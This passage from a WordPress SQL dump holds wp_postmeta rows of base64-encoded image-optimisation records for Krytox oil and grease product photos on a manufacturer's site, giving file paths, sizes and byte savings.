lcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UyLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMi0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTItMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjYwMSwidGltZSI6MTQ4MzU3NjYxMSwiaWQiOjEwODJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UyLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMi0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTItMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjc3NywidGltZSI6MTQ4MzU3NjYxNCwiaWQiOjEwODJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UyLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTItMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjg5NiwidGltZSI6MTQ4MzU3NjYxOCwiaWQiOjEwODJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UyLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMi00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTItNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjExMDcsInRpbWUiOjE0ODM1NzY2MjIsImlkIjoxMDgyfV0='); 
INSERT INTO `wp_postmeta` VALUES (29772, 1081, 'wpfc_optimisation_reduction', '2504454'); 
INSERT INTO `wp_postmeta` VALUES (29773, 1081, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTEuanBnIiwid2lkdGgiOjM0NzksImhlaWdodCI6MjY1MCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTEuanBnIiwicmVkdWN0aW9uIjoyNTA0NDQwLCJ0aW1lIjoxNDgzNTc2NjMzLCJpZCI6IjEwODEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NjYzNiwiaWQiOjEwODF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMS04MDB4NjA5LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NjA5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTEtODAweDYwOS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UxLTgwMHg2MDkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc2NjM5LCJpZCI6MTA4MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UxLTc2OHg1ODUuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1ODUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMS03Njh4NTg1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTEtNzY4eDU4NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzY2NDIsImlkIjoxMDgxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTEtMTYwMHgxMjE5LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEyMTksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMS0xNjAweDEyMTkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMS0xNjAweDEyMTkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc2NjQ2LCJpZCI6MTA4MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UxLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzY2NDksImlkIjoxMDgxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UxLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NjY1MSwiaWQiOjEwODF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UxLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc2NjU0LCJpZCI6MTA4MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UxLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzY2NTcsImlkIjoxMDgxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTEtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc2NjU5LCJpZCI6MTA4MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTEtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UxLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMS0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NjY2MiwiaWQiOjEwODF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UxLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTEtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzY2NjQsImlkIjoxMDgxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTEtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UxLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc2NjY3LCJpZCI6MTA4MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTEtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UxLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NjY2OSwiaWQiOjEwODF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UxLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlMS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTEtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzY2NzIsImlkIjoxMDgxfV0='); 
INSERT INTO `wp_postmeta` VALUES (29774, 1080, 'wpfc_optimisation_reduction', '13764'); 
INSERT INTO `wp_postmeta` VALUES (29775, 1080, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLmpwZyIsIndpZHRoIjo0OTkyLCJoZWlnaHQiOjM4OTUsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NzY2NzcsImlkIjoiMTA4MCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo2NDcsInRpbWUiOjE0ODM1NzY2ODEsImlkIjoxMDgwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS04MDB4NjI0LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NjI0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS04MDB4NjI0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS04MDB4NjI0LmpwZyIsInJlZHVjdGlvbiI6MTMyOSwidGltZSI6MTQ4MzU3NjY4NSwiaWQiOjEwODB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLTc2OHg1OTkuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1OTksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLTc2OHg1OTkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLTc2OHg1OTkuanBnIiwicmVkdWN0aW9uIjoxMjUxLCJ0aW1lIjoxNDgzNTc2Njg5LCJpZCI6MTA4MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtMTYwMHgxMjQ4LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEyNDgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLTE2MDB4MTI0OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtMTYwMHgxMjQ4LmpwZyIsInJlZHVjdGlvbiI6Mzg4NiwidGltZSI6MTQ4MzU3NjY5NCwiaWQiOjEwODB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NTgsInRpbWUiOjE0ODM1NzY2OTcsImlkIjoxMDgwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDc5LCJ0aW1lIjoxNDgzNTc2NzAwLCJpZCI6MTA4MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGR